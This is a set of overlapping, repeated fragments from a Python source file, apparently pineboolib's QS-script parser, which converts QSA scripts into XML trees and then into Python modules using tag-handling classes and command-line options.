"print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize",
"options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full =",
"if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def",
"0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class",
"self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__]",
"class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags",
"tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags",
"\"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags =",
"False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write PY",
"str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype,",
"os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname",
"== \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type):",
"tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\"",
"tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags =",
"pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname,",
"return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"]",
"parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to",
"Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems)",
"== \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype)",
"in listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in",
"class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags",
"parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']:",
"ListObject(TagObject): set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other",
"bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename)))",
"\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush()",
"action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False,",
"for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not",
".\") try: execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error",
"destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname",
"modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import io if",
"if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if",
"['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject):",
"> os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args):",
"len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other",
"listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags",
"no existe: %s\" % name) continue mod = Module(name, path) if not mod.loadModule():",
"dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False",
"+ \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args)",
"class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags",
"= stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar",
"== \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" %",
"adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"]",
"vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype",
"= True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False",
"listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn,",
"tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"]",
"== 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems)",
"print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2",
"except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {}",
"if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def",
"None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self,",
"['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__",
"if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0]",
"sys import imp import traceback from lxml import etree try: from pineboolib.flparser import",
"classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname)",
"= ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject):",
"self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class",
"self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"]",
"1 - Parse and write XML file . . .\") try: execute(options, args)",
"[x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x)",
"tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self):",
"str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem):",
"CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"]",
"1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent",
"= [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject):",
"in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj):",
"%-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\")",
"filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%)",
"class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname =",
"old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname",
"[\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class",
"fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" %",
"self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname",
"def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject):",
"= False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False",
"= create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v) is",
"parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i,",
"tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = []",
"KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown",
"= \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class",
"imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp =",
"destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout",
"sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\")",
"execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\",",
"ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def",
"= path def loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE)",
"vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\")",
"== \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname ==",
"%-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No",
"parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages",
"isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug:",
"encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc()) result =",
". . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs))",
"self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child",
"# print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name =",
"= [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\",",
"calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception:",
"return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases,",
"[\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"[] set_child_argn = False name_is_first_id = False debug_other = True adopt_childs_tags = []",
"else: if options.cache: args = [x for x in args if not os.path.exists(x",
"not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path)",
"Module(object): def __init__(self, name, path): self.name = name self.path = path def loadModule(self):",
"except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not",
"arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython",
"name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg =",
"= \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"]",
"tags = [\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject):",
"guardar resultado, no hace falta calcular mas continue tree_data = None try: tree_data",
"vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn ==",
"elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i +=",
"[\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject):",
"if options.cache: args = [x for x in args if not os.path.exists(x +",
"== \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype ==",
"Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement',",
"dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results",
"vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\"",
"== self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"]",
"pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath, bname",
"class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject):",
"k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1",
"return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags):",
"print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY",
"(%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose:",
"continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al",
"@classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname =",
"if vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if",
"return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn,",
"= [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if",
"vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value)",
"bname + \".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\")",
"'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] #",
"False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags",
"global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = []",
"as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e)",
"open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se",
"[\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject):",
"post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def",
"print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv): parser =",
"callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other =",
"debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags =",
"\".xml\") else: destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True))",
"1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname):",
"vtype == \"FCONST\": vtype = \"Number\" self.const_value = value self.const_type = vtype self.xml.set(\"type\",",
"at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def",
"add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem)",
"return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS:",
"filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error:",
"options.exec_python options.exec_python = False options.full = False options.toxml = True if options.verbose: print(\"Pass",
"not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname]",
"cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import io",
"options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write XML file",
"FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType]",
"in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return",
"def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self):",
"sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al",
"xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def",
"Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) #",
"adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\",",
"= False options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write",
"default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file",
"str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject):",
"decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname]",
"1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return",
"callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self,",
"file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\",",
"listobj def get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname",
"class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject):",
"False except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return",
"= flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname)",
"self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject):",
"tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def",
"filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no",
"is None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags",
"and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False",
"Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return result def",
"pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist =",
"try: execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\")",
"= subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml)",
"\"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class",
"False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn",
"bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname",
"child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in",
"dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args)",
"parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\",",
"None: self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem =",
"[\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list',",
"__init__(self, name, path): self.name = name self.path = path def loadModule(self): fp =",
"= [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem",
"ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags =",
"\"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype",
"def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\"))",
"False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"]",
"dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless",
"useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\",",
"+ \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout =",
"mod = Module(name, path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name)",
"\".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if",
"result = False except Exception as e: print(traceback.format_exc()) result = False if fp:",
"\"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\"",
"add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False",
"[\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject):",
"subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags =",
"%r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) >",
"pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\")",
"self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0",
"= ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"]",
"os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \"",
"\"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\"",
"argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject):",
"help=\"If dest file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options,",
"tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class",
". .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False",
"= [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self):",
"is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i,",
"vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype =",
"[(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar",
"= [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False",
"= True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0",
"= False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write",
"callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class",
"[] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name,",
"self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn:",
"True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False",
"self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self",
"%r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\"",
"filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath):",
"TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct)",
"value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\",",
"class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value = str(value)",
"tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"]",
"open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name,",
"if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return",
"if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename +",
"= ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class",
"if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject):",
"parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False,",
"continue if options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename",
"class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags",
"False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype,",
"execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython",
"None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED)",
"[] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for",
"print(\"Pass 3 - Test PY file load . . .\") options.topython = False",
"prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s",
"tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self,",
"if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags =",
"% filename) print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2:",
"% self.name) result = False except Exception as e: print(traceback.format_exc()) result = False",
"no se quiere guardar resultado, no hace falta calcular mas continue tree_data =",
"('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")]",
"def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn =",
". . (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs))",
"\"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn =",
"%d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: #",
"destname = filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if",
"Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def",
